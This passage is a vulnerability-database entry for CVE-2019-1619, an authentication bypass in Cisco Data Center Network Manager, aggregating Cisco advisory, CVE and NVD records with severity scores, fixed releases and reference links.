TAC:\r\nhttps://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html [\"https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html\"]\r\n\r\nCustomers should have the product serial number available and be prepared to provide the URL of this advisory as evidence of entitlement to a free upgrade.\r\n\r\nFixed Releases\r\n\r\nCisco fixed this vulnerability in Cisco DCNM Software Release 11.1(1) and later.\r\n\r\nCustomers can download Cisco Data Center Network Manager Software from the Software Center [\"https://software.cisco.com/download/home\"] on Cisco.com by doing the following:\r\n\r\nClick Browse All.\r\nChoose Cloud and Systems Management \u003e Data Center Infrastructure Management \u003e Data Center Network Manager.\r\nAccess releases by using the left pane of the Data Center Network Manager page.",
        "title": "Fixed Software"
      },
      {
        "category": "general",
        "text": "To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy [\"https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html\"]. This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco.",
        "title": "Vulnerability Policy"
      },
      {
        "category": "general",
        "text": "The Cisco Product Security Incident Response Team (PSIRT) is aware that proof-of-concept exploit code is available for the vulnerability described in this advisory.\r\n\r\nThe Cisco PSIRT is not aware of any malicious use of the vulnerability that is described in this advisory.",
        "title": "Exploitation and Public Announcements"
      },
      {
        "category": "general",
        "text": "Cisco would like to thank the independent security researcher Pedro Ribeiro for reporting this vulnerability to the iDefense Vulnerability Contributor Program.",
        "title": "Source"
      },
      {
        "category": "legal_disclaimer",
        "text": "THIS DOCUMENT IS PROVIDED ON AN \"AS IS\" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.\r\n\r\nA standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products.",
        "title": "Legal Disclaimer"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "Emergency Support:\r\n+1 877 228 7302 (toll-free within North America)\r\n+1 408 525 6532 (International direct-dial)\r\nNon-emergency Support:\r\nEmail: psirt@cisco.com\r\nSupport requests that are received via e-mail are typically acknowledged within 48 hours.",
      "issuing_authority": "Cisco product security incident response is the responsibility of the Cisco Product Security Incident Response Team (PSIRT). The Cisco PSIRT is a dedicated, global team that manages the receipt, investigation, and public reporting of security vulnerability information that is related to Cisco products and networks. The on-call Cisco PSIRT works 24x7 with Cisco customers, independent security researchers, consultants, industry organizations, and other vendors to identify possible security issues with Cisco products and networks.\r\nMore information can be found in Cisco Security Vulnerability Policy available at https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html",
      "name": "Cisco",
      "namespace": "https://wwww.cisco.com"
    },
    "references": [
      {
        "category": "self",
        "summary": "Cisco Data Center Network Manager Authentication Bypass Vulnerability",
        "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass"
      },
      {
        "category": "external",
        "summary": "Cisco Security Vulnerability Policy",
        "url": "https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html"
      },
      {
        "category": "external",
        "summary": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass",
        "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass"
      },
      {
        "category": "external",
        "summary": "https://www.cisco.com/c/en/us/products/end-user-license-agreement.html",
        "url": "https://www.cisco.com/c/en/us/products/end-user-license-agreement.html"
      },
      {
        "category": "external",
        "summary": "Cisco Security Advisories and Alerts page",
        "url": "https://www.cisco.com/go/psirt"
      },
      {
        "category": "external",
        "summary": "https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html",
        "url": "https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html"
      },
      {
        "category": "external",
        "summary": "Software Center",
        "url": "https://software.cisco.com/download/home"
      },
      {
        "category": "external",
        "summary": "Security Vulnerability Policy",
        "url": "https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html"
      }
    ],
    "title": "Cisco Data Center Network Manager Authentication Bypass Vulnerability",
    "tracking": {
      "current_release_date": "2019-09-19T16:08:37+00:00",
      "generator": {
        "date": "2022-09-03T03:09:51+00:00",
        "engine": {
          "name": "TVCE"
        }
      },
      "id": "cisco-sa-20190626-dcnm-bypass",
      "initial_release_date": "2019-06-26T16:00:00+00:00",
      "revision_history": [
        {
          "date": "2019-06-26T13:58:58+00:00",
          "number": "1.0.0",
          "summary": "Initial public release."
        },
        {
          "date": "2019-09-19T16:08:37+00:00",
          "number": "1.1.0",
          "summary": "Documented the availability of a proof-of-concept exploit."
        }
      ],
      "status": "final",
      "version": "1.1.0"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "category": "product_family",
            "name": "Cisco Data Center Network Manager",
            "product": {
              "name": "Cisco Data Center Network Manager ",
              "product_id": "CSAFPID-233075"
            }
          }
        ],
        "category": "vendor",
        "name": "Cisco"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2019-1619",
      "ids": [
        {
          "system_name": "Cisco Bug ID",
          "text": "CSCvo64641"
        }
      ],
      "notes": [
        {
          "category": "other",
          "text": "Complete.",
          "title": "Affected Product Comprehensiveness"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-233075"
        ]
      },
      "release_date": "2019-06-26T16:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "Cisco has released software updates that address this vulnerability.",
          "product_ids": [
            "CSAFPID-233075"
          ],
          "url": "https://software.cisco.com"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          "products": [
            "CSAFPID-233075"
          ]
        }
      ],
      "title": "Cisco Data Center Network Manager Authentication Bypass Vulnerability"
    }
  ]
}

GSD-2019-1619

Vulnerability from gsd - Updated: 2023-12-13 01:23

Details

Aliases

CVE-2019-1619

Aliases

CVE-2019-1619

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2019-1619",
    "description": "A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device.",
    "id": "GSD-2019-1619",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2019-1619"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2019-1619"
      ],
      "details": "A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device.",
      "id": "GSD-2019-1619",
      "modified": "2023-12-13T01:23:52.104843Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "psirt@cisco.com",
        "DATE_PUBLIC": "2019-06-26T16:00:00-0700",
        "ID": "CVE-2019-1619",
        "STATE": "PUBLIC",
        "TITLE": "Cisco Data Center Network Manager Authentication Bypass Vulnerability"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "Cisco Data Center Network Manager ",
                    "version": {
                      "version_data": [
                        {
                          "affected": "\u003c",
                          "version_value": "11.1(1)"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "Cisco"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device."
          }
        ]
      },
      "exploit": [
        {
          "lang": "eng",
          "value": "The Cisco Product Security Incident Response Team (PSIRT) is not aware of any malicious use of the vulnerability that is described in this advisory. "
        }
      ],
      "impact": {
        "cvss": {
          "baseScore": "9.8",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H ",
          "version": "3.0"
        }
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "CWE-284"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "20190626 Cisco Data Center Network Manager Authentication Bypass Vulnerability",
            "refsource": "CISCO",
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass"
          },
          {
            "name": "108902",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/108902"
          },
          {
            "name": "20190708 Cisco Data Center Manager multiple vulns; RCE as root",
            "refsource": "BUGTRAQ",
            "url": "https://seclists.org/bugtraq/2019/Jul/11"
          },
          {
            "name": "http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html"
          },
          {
            "name": "20190709 Cisco Data Center Manager multiple vulns; RCE as root",
            "refsource": "FULLDISC",
            "url": "http://seclists.org/fulldisclosure/2019/Jul/7"
          },
          {
            "name": "http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html"
          }
        ]
      },
      "source": {
        "advisory": "cisco-sa-20190626-dcnm-bypass",
        "defect": [
          [
            "CSCvo64641"
          ]
        ],
        "discovery": "INTERNAL"
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:cisco:data_center_network_manager:10.4\\(2\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@cisco.com",
          "ID": "CVE-2019-1619"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-798"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20190626 Cisco Data Center Network Manager Authentication Bypass Vulnerability",
              "refsource": "CISCO",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass"
            },
            {
              "name": "108902",
              "refsource": "BID",
              "tags": [
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://www.securityfocus.com/bid/108902"
            },
            {
              "name": "20190708 Cisco Data Center Manager multiple vulns; RCE as root",
              "refsource": "BUGTRAQ",
              "tags": [
                "Mailing List",
                "Third Party Advisory"
              ],
              "url": "https://seclists.org/bugtraq/2019/Jul/11"
            },
            {
              "name": "http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html",
              "refsource": "MISC",
              "tags": [
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html"
            },
            {
              "name": "20190709 Cisco Data Center Manager multiple vulns; RCE as root",
              "refsource": "FULLDISC",
              "tags": [
                "Mailing List",
                "Third Party Advisory"
              ],
              "url": "http://seclists.org/fulldisclosure/2019/Jul/7"
            },
            {
              "name": "http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html",
              "refsource": "MISC",
              "tags": [
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 6.4,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2020-10-06T19:55Z",
      "publishedDate": "2019-06-27T03:15Z"
    }
  }
}

Tags

Taxonomy of the tags.

All sightings related to this event Export sightings related to this event

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2019-1619 (GCVE-0-2019-1619)

Solution

Solution

Tags

Sightings

Nomenclature